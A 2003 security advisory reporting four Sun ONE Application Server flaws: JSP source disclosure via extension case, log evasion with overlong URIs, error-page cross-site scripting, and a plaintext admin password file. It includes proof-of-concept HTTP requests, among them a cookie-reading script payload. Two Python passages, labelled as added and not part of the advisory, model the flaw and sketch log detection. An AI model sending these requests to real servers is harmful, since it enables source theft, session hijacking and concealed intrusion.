[UNIX] Multiple Vulnerabilities in Sun-One Application Server
From: SecuriTeam (support_at_securiteam.com)
Date: 05/29/03
To: list@securiteam.com Date: 29 May 2003 20:09:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Multiple Vulnerabilities in Sun-One Application Server
------------------------------------------------------------------------
SUMMARY
During a brief audit of a SunONE Application Server installation on
Windows 2000, SPI Labs discovered a number of vulnerabilities. Each of the
vulnerabilities is described in detail below.
DETAILS
Issue 1: JSP source code disclosure
It is possible to view the source code of JSP applications by changing the
case of the file extension in the HTTP request. The vulnerability is due
to UNIX code being ported to the Microsoft Windows platform where the file
system is case insensitive. When a request is received, the server
performs a case sensitive check to determine if the request ends in
".jsp". If it does, the JSP engine will process it. Otherwise, it will see
if it can retrieve the requested resource from the file system. On Unix
operating systems, this will fail because "file.jsp" cannot be opened
by asking for "file.JSP". However, on Windows the file will be returned
because the file system is case insensitive. Below is an example of a
normal request/response, followed by the same request/response with the
case change applied. The headers and response data have been trimmed for
clarity.
Original request
GET /hello.jsp HTTP/1.0
Original response
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)
<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
</body></html>
Request with case change
GET /hello.JSP HTTP/1.0
Response with case change
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)
<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring day.
</body></html>
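The dispatch flaw behind Issue 1, modelled as an added example that is not Sun ONE's code: a case-sensitive ".jsp" test followed by a file-system lookup that, on Windows, matches names ignoring case. The web root, the file-system model and the JSP engine stand-in are all constructed; the fixed variant decides by the extension of the file the file system actually opened.

```python
"""Added illustration of Issue 1 (not Sun ONE's code): a case-sensitive
".jsp" test followed by a case-insensitive file lookup discloses the source."""
import os

# Constructed web root: real file name -> raw file contents (JSP source).
WEBROOT = {
    "hello.jsp": "<html>It is <%= new java.util.Date().toString() %></html>",
}

def fs_open(path, case_insensitive):
    """Model of the file system. Returns (real_name, contents) or None.
    On Windows the name is matched ignoring case; on Unix it is exact."""
    name = path.lstrip("/")
    for real, data in WEBROOT.items():
        if real == name or (case_insensitive and real.lower() == name.lower()):
            return real, data
    return None

def jsp_engine(source):
    """Stand-in for the JSP engine: the page is compiled and run, so only
    rendered output (no <%= %> scriptlets) reaches the client."""
    return "<html>It is Fri March 14 15:29:40 EST 2003</html>"

def vulnerable_dispatch(path, case_insensitive):
    """The advisory's behaviour: decide by the request string, not the file."""
    if path.endswith(".jsp"):                      # case-SENSITIVE test
        hit = fs_open(path, case_insensitive)
        return jsp_engine(hit[1]) if hit else "404 Not Found"
    hit = fs_open(path, case_insensitive)          # static-file fallback
    return hit[1] if hit else "404 Not Found"      # raw JSP source on Windows

def fixed_dispatch(path, case_insensitive):
    """Decide by the extension of the file the file system actually opened,
    compared case-insensitively, so no spelling of the name skips the engine."""
    hit = fs_open(path, case_insensitive)
    if hit is None:
        return "404 Not Found"
    real_name, data = hit
    if os.path.splitext(real_name)[1].lower() == ".jsp":
        return jsp_engine(data)
    return data
```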
Issue 2: Log evasion
Only the first 4042 characters of a request URI are logged, even though
the maximum URI length appears to be 4096 characters. This gives an
attacker 54 characters to construct an attack with. Although it is possible
that an administrator would still notice the unusual requests, he or she
would be unable to determine what files or parameters the attacker would
be requesting. Because of this, the administrator would not be able to
find out what components of their system are being exploited. Below we
provide an example request for /hello.jsp, as well as the log data. The
headers, request and response data have been trimmed for clarity.
Request for /hello.jsp
GET /AAAAAAAAAAAAAA[ up to 4042 characters]/../hello.jsp HTTP/1.0
Console message
WARNING: HTTP4198: flex log buffer overflow- greater than 4096 characters
Server log file
[04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow greater than 4096 characters
Access log file
172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /AAAAAAAAAA[ up to 4042 characters] "
The name of the file that was accessed does not appear in the logs.
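A detection sketch for Issue 2, added here and not part of the advisory: it flags access-log entries whose request field was cut off (no trailing HTTP/x.y token, or a URI at the 4042-character logging limit) and pulls the matching HTTP4198 overflow warnings from the server log so the two can be correlated by time. The log layout follows the samples above; every log line below is constructed.

```python
"""Added detection sketch for Issue 2 (not part of the advisory). Assumes the
access-log layout shown above; all sample lines are constructed."""
import re

LOGGED_URI_LIMIT = 4042            # only this many URI characters are logged
OVERFLOW_MARKER = "HTTP4198"       # server-log warning emitted on overflow

# client, ident, user, [timestamp], "request"
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"')

def truncated_requests(access_lines):
    """Return (client, timestamp, request) for entries whose request field was
    cut off: no trailing HTTP/x.y token, or a URI at the logging limit."""
    hits = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue                               # not an access-log entry
        client, stamp, req = m.groups()
        parts = req.split()
        has_proto = len(parts) >= 3 and parts[-1].startswith("HTTP/")
        uri = parts[1] if len(parts) >= 2 else ""
        if not has_proto or len(uri) >= LOGGED_URI_LIMIT:
            hits.append((client, stamp, req))
    return hits

def overflow_warnings(server_lines):
    """Server-log lines that confirm the access log entry was truncated."""
    return [line for line in server_lines if OVERFLOW_MARKER in line]

# Constructed samples: a normal entry and one shaped like the advisory's.
CUT = "GET /" + "A" * LOGGED_URI_LIMIT + " "       # path and protocol lost
ACCESS_LOG = [
    '172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /hello.jsp HTTP/1.0"',
    '172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "' + CUT + '"',
]
SERVER_LOG = [
    "[04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow "
    "greater than 4096 characters",
    "[04/Mar/2003:10:53:00] INFO ( 1304): unrelated message (constructed)",
]
```

Any flagged entry is one where the requested resource can only be recovered from other sources (packet capture, a reverse proxy log with a higher limit), so the correlation matters more than the entry itself.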
Issue 3: Cross site scripting
If an error occurs while processing a Java application, it may be possible
to execute cross-site scripting attacks by placing scripted content in the
query string. Below is an example of a request using a sample application
followed by the relevant portion of the response.
Request
GET /webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script> HTTP/1.0
Response snippet
Exception Report<br><br>
<b>Message: </b>Internal Server Error<br>
<p>
<b>Exception</b>
<pre>javax.servlet.ServletException: Invalid JSP file
<script>alert(document.cookie)</script>
at
org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:471)
at _jasper._jsp._source_jsp._jspService(_source_jsp.java:88)
Issue 4: Incorrect local file permissions and plaintext passwords
When installing SunONE on Windows 2000 the default installation directory
is C:\sun. Any file or directory created in this directory will be
world-readable. The "statefile" located at C:\sun\appserver7\statefile
contains a plaintext username and password to the administrative server.
Remediation:
Sun Microsystems was contacted on 18 March 2003 and again on numerous
occasions without results. We hope that by publishing this information,
the vendor will correct these problems. Unfortunately, there is no
remediation procedure for the first, second or third issues. For the last
issue, "Incorrect local file permissions and plaintext passwords" we
recommend that the permissions of the statefile be changed so that only
the administrator can access it.
ADDITIONAL INFORMATION
The information has been provided by <mailto:spilabs@spidynamics.com> SPI
Labs.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.